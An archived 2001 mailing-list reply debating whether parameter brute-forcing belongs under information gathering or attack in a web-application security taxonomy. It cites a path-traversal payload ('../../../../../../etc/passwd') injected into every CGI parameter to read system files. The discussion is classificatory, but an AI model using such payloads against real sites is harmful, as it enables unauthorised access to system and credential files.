Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email email@example.com
From: Jeremiah Grossman (jeremiahwhitehatsec.com)
Date: Mon Oct 01 2001 - 12:09:16 CDT
Dennis Groves wrote:
> > hiall,
> > sorry for this late input/question .. but .. which category does
> > "PARAMETER BRUTE-FORCING/GUESSING"
> What will you do with this information? How does it break a web application?
> I am inclined to think that it belongs in INFORMATION GATHERING as CGI
> PARAMETER ENUMERATION.
This is little about what someone said before... "attacks covering multiple
Parameter Brute Forcing is a real attack and can be used for both enumeration
AND penetration. Case in point...
the recent apache bug that can gather active usernames on the system... or
scripting a parameter tampert attack that replaces all parameters in all
cgi's on a site with a "../../../../../../etc/passwd". Yes, this has worked on
many high profile sites.
So, as you can see, its both.
The kind of things we have to work though on not get hung up on.